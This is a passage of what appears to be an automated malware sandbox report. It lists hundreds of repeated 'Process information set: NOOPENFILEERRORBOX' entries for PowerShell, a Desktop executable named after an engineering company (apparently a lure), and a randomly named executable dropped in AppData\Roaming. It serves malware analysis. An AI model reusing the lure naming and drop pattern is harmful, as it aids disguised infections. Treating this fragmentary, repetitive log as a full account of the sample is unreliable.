              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
